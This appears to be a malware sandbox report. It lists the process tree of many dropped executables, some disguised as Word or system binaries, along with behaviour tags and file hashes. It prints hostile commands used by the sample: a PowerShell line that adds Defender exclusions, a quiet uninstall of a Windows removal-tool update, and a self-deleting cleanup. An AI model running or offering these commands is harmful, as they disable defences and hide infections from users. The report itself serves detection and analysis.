                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\crypt_file.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\crypt_file.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2532
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 1240
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:672
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 1224
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:3052
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\MicrosoftOfficeWord.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\MicrosoftOfficeWord.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:232
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 496
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\FeedStation.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\FeedStation.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4028
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\davies.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\davies.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 696
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    PID:2580
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\build.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\build.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:400
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6028
                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2184
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\123.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\123.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3476
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1240
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:5916
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\MicrosoftWORD.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\MicrosoftWORD.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6104
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 328
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:5828
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4244
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe" & rd /s /q "C:\ProgramData\3W4WB1DBIMOZ" & exit
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5808
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                    timeout /t 10
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:1664
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\Test2.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\Test2.exe"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4408
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\84m3gETFLRHV.bat" "
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:5340
                                                                                                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                            chcp 65001
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:3512
                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                              ping -n 10 localhost
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                              PID:3344
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Syncing.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Syncing.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:1628
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\pjthjsdjgjrtavv.exe"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:3292
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\ktyihkdfesf.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\ktyihkdfesf.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:3316
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\987656789009800.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\987656789009800.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\FTQP098767800.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\FTQP098767800.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4844
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\dlhost.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\dlhost.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3904
                                                                                                                                                                                                                                                  • C:\Windows\Systemhau.exe
                                                                                                                                                                                                                                                    C:\Windows\Systemhau.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                    PID:3420
                                                                                                                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1548
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2268
                                                                                                                                                                                                                                                      • C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                                                                                                                        C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:3960
                                                                                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                          PID:4828
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3212
                                                                                                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4512
                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2380
                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                conhost.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2400
                                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                                                                                                                                                                "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:1108
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                                                                • C:\Windows\system32\dwm.exe
                                                                                                                                                                                                                                                                  "dwm.exe"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5300
                                                                                                                                                                                                                                                                  • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                                                                                                                                                    C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2116
                                                                                                                                                                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:448
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:1456
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:692
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\encvbk.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\encvbk.exe "c:\program files (x86)\241264609.dll",MainThread
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4664
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:332
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4788 -ip 4788
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:4300
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3476 -ip 3476
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5692
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3264 -ip 3264
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5248
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2532 -ip 2532
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5196
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2532 -ip 2532
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:460
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2288 -ip 2288
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:5716
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 232 -ip 232
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5872
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6104 -ip 6104
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:540

                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              734B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              e192462f281446b5d1500d474fbacc4b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              5ed0044ac937193b78f9878ad7bac5c9ff7534ff

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9D318601BDF00FF2E269CACDB8999E72

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              345B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              181a6ef75cbea0ff66c1beef3e5aff4b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              9898da5fa6815ff234243f78a3c7ed41b9b28858

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              ec94c95aca09dbd08781fcb7fad8bcb7449c7ba96732c1965c2dec8944302dc1

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              ff6699e69b5de47a879bf9411c7beda79cbaf7733755d602f4badcf4e53d248ee61005dc6f85f90f91451488092c49efa6f971935deacb81840bce71c7712431

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              192B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              cbf69b05d8158ebecf61a6c7a62a1728

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c7322a0d3188d31ca26cacf9c45349f003b6d641

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              c6f82c6eb3d71749da2547a85af7c44117e29157b035324e61c9ae86299948eb

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              32a4f29d7a5c064fe298d8a1df1d5c01fc91ab67352180b42c1bd17c53c74b4b0a30b5d6c72c6601e8c6f19ec150aa865f1cd1ba329e4a777c620bf6971c550d

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9D318601BDF00FF2E269CACDB8999E72

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              548B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              5ccade07088be7cea18c23bd4eed94dc

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8c0bc3029e8017a936d39adc58988831617e4805

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              6faac64841aa2652c7fbb0d6aea5ac291544b671be456baf312dbbd30e41e712

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              17d50677e09329fbcecd1b9f6129b2573fe5edb642cf5ee410ee8aa7ea0af7f58dce08f542ed86cc29b7e97b9ea4cb3bd7ada6aa17a12fe73326e502be73a3bd

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              312B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              792d03c0336a5e46b8ac29becfba357c

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              2416e22000d5b1bf396dd009b701eeecc0259067

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e3811a298a0dd12b2cb59db97c4e2df8e0fc50467d961eb1b4b02620904d8942

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              42f5f34f92506c0e5af914aed44b37c38f22592a1b13116c4aa4f558a91ef188366ec65c999c7b21a76de9b9f70b417ccab3ead745a5274b9bab763150791b8a

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              264KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              607aeb9cde62cb5dc3cc4cebbde68637

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              810cf6de78619dd2f86024623c70bdb0fb67ddc7

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f6c5cfbbf4d479cda8fd90281643f97168630643dcb287dd26a74962617017bc

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              781d11ae881f37eb152dad8f24b42f0f5034fd726edf167205949f709413d2328fb37dad096f8d0d337d0e67ebcfa948754862c82aa2d002a4f9e8534e7ce65b

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1002B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              11586d7ba86b2ea20d02eea52261d87e

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              0b95ce78384de5f0ac0a194aad4d0774019b6650

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              4e87c1be300c4c661646990c3f9a7daf435afa2480c1e015d2762e9a34bbc542

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              20e6c9c20cd4c26739186ed6ffd5d748ea367842f7fffba63b82ae8b4aabbe013aae7994b878821423fb07db28815d4d343b811d9b7b8fdbdd316f039ce90170

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              a8f1adb06d5a5fc98a32004ab992a62f

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              fd542e119359c777f65b08c42e8d9534a4f4799a

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              338cfb8b415d6c6018679b4348b6a719b21d3e3ab327a142b4e5fe7888561fb8

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              f716c61ef54e402f9e6677fef82a7959b86cf2d803a70a783a8e5c204d44c29a03c0cc3ab126a5f5351a5196a261d906d044fbb96b2f6e0fd037449459c11688

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              116KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              90d2710694a5a9ed0e453f7204162557

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              adb4fb05fcaf70ebeacf15bed44bb9a5b494618c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              12b281e6382489c28f5e14e55c78cab12ad75ea82b7711f1b7cebd4340ea842b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              5a9a882646c3f39c37cc98f76210954fc3275e3aa76638956b336c3d7e6803530431afd0cfa5a48c15ef3ca2155e80e2aa6decfaf77bfbc6bbc7e78a06ac7199

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FullOption_2.1Xenos.exe.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              654B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\diskutil.exe.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              baf55b95da4a601229647f25dad12878

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              abc16954ebfd213733c4493fc1910164d825cac8

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

